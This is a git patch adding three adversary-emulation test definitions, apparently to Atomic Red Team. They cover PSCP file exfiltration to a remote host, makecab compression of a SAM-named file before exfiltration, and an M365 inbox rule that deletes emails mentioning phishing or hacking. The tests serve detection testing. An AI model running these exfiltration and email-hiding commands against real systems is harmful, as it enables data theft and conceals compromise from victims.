From 2e9bea8316becd8a32b3873adb4861b666a0da86 Mon Sep 17 00:00:00 2001
From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com>
Date: Wed, 25 Sep 2024 07:42:55 +1000
Subject: [PATCH] Blueteam0ps 31072024 (#2902)

* Update T1560.001.yaml

* Create T1564.008.yaml

* Update T1105.yaml

* Update T1560.001.yaml

Added back elevation_required: true to the previous test as it was mistakenly removed.

* Update T1105.yaml

Fixed up errors

* Update T1560.001.yaml

removed addition elevation_required option

* Update T1560.001.yaml

Fixed the issues based on the feedback
---
 atomics/T1105/T1105.yaml         | 56 ++++++++++++++++++++++++++++++++
 atomics/T1560.001/T1560.001.yaml | 32 ++++++++++++++++--
 atomics/T1564.008/T1564.008.yaml | 50 ++++++++++++++++++++++++++++
 3 files changed, 136 insertions(+), 2 deletions(-)
 create mode 100644 atomics/T1564.008/T1564.008.yaml

diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index f3e1e911..8add7f04 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -920,3 +920,59 @@ atomic_tests:
     cleanup_command:  rm "#{local_file_path}" 2>$null | Out-Null
     name: powershell
     elevation_required: true
+- name: Remote File Copy using PSCP
+  auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
+  description: |
+    Copy a staged file using PSCP.exe to a public target location.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pscp_url:
+      description: pscp.exe download path
+      type: string
+      default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
+    pscp_binary:
+      description: PSCP binary location
+      type: string
+      default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe'
+    scp_user:
+      description: Username of the SCP user
+      type: string
+      default: 'atomic'
+    scp_password:
+      description: Password for the SCP User
+      type: string
+      default: 'atomic'
+    scp_port:
+      description: port for the remote server
+      type: string
+      default: '22'
+    exfil_package:
+      description: path to exfil package
+      type: path
+      default: 'C:\Temp\T1105_scp.zip'
+    target_location:
+      description: Remote location where the data will be copied to.
+      type: string
+      default: 127.0.0.1
+    target_filename:
+      description: Filename on the destination.
+      type: string
+      default: T1105_scp.zip    
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      pscp.exe must be available on the system.
+    prereq_command: |
+      if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+  executor:
+    command: |
+      fsutil file createnew C:\Temp\T1105_scp.zip 1048576
+      echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
+    cleanup_command: |
+      del /f /q #{exfil_package}
+    name: command_prompt
+    elevation_required: false
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml
index a71b8351..8826a74d 100644
--- a/atomics/T1560.001/T1560.001.yaml
+++ b/atomics/T1560.001/T1560.001.yaml
@@ -383,5 +383,33 @@ atomic_tests:
       rm c:\temp\loghost.txt
     name: powershell
     elevation_required: true
-
-  
\ No newline at end of file
+- name: Compress a File for Exfiltration using Makecab
+  auto_generated_guid: 2a7bc405-9555-4f49-ace2-b2ae2941d629
+  description: |
+    An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
+    [reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    input_file:
+      description: Path to source file for compression
+      type: path
+      default: 'C:\Temp\sam.hiv'
+    output_file:
+      description: Path of the CAB file
+      type: path
+      default: 'C:\Temp\art.zip'
+  dependencies:
+  - description: |
+      A sample file for compression must be located at specified location (#{input_file})
+    prereq_command: |
+      if not exist "#{input_file}" (exit /b 1)
+    get_prereq_command: |
+      fsutil file createnew c:\Temp\sam.hiv 10485760
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      makecab.exe #{input_file} #{output_file}
+    cleanup_command: |
+      del #{output_file}
diff --git a/atomics/T1564.008/T1564.008.yaml b/atomics/T1564.008/T1564.008.yaml
new file mode 100644
index 00000000..a65dee21
--- /dev/null
+++ b/atomics/T1564.008/T1564.008.yaml
@@ -0,0 +1,50 @@
+attack_technique: T1564.008
+display_name: 'Hide Artifacts: Email Hiding Rules'
+atomic_tests:
+- name: New-Inbox Rule to Hide E-mail in M365
+  auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
+  description: |
+    This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
+     Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
+  supported_platforms:
+  - azure-ad 
+  input_arguments:
+    auth_username:
+      description: M365 Username
+      type: string
+      default: john@contoso.com
+    auth_password:
+      description: M365 Password
+      type: string
+      default: p4sswd
+    mail_rulename:
+      description: Name of the inbox rule.
+      type: string
+      default: default
+    target_mailbox:
+      description: Mailbox you are creating the rule in
+      type: string
+      default: jane@contoso.com
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      ExchangeOnlineManagement module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name ExchangeOnlineManagement -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name ExchangeOnlineManagement -Force
+  executor:
+    command: |
+      Import-Module ExchangeOnlineManagement
+      $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+      $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+      Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
+      New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
+    cleanup_command: |
+      Import-Module ExchangeOnlineManagement
+      $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+      $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+      Connect-ExchangeOnline -Credential $credential
+      Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
+    name: powershell
+    elevation_required: false